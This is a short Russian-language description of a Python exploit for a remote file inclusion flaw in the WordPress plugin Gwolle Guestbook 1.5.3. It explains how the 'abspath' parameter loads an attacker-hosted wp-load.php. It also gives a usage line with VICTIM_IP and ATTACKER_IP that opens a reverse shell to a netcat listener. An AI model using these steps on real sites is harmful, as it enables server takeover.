
WordPress плагин Gwolle Guestbook 1.5.3 - Удаленное включение файла
Этот скрипт на Python эксплуатирует критическую уязвимость Remote File Inclusion (RFI) в плагине Gwolle Guestbook для WordPress, которая позволяет неаутентифицированному злоумышленнику включить удалённый PHP-файл и выполнить произвольный код на уязвимой системе.
HTTP GET-параметр "abspath" недостаточно очищается перед использованием в PHP-функции require(). Удалённый злоумышленник может включить файл с именем 'wp-load.php' с произвольного удалённого сервера и выполнить его содержимое на уязвимом веб-сервере. Для этого злоумышленнику необходимо разместить вредоносный файл 'wp-load.php' в корневом каталоге своего сервера и включить URL сервера в запрос.
Успешная эксплуатация этой уязвимости может привести к компрометации всей установки WordPress и даже к компрометации всего веб-сервера.
Скрипт требует три аргумента:
Пример:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTПримечание: У вас должен быть открыт netcat listener на машине атакующего на указанном порту.
Этот скрипт предоставлен только в образовательных целях. Автор не несёт ответственности за любой ущерб, причинённый неправильным использованием этого скрипта.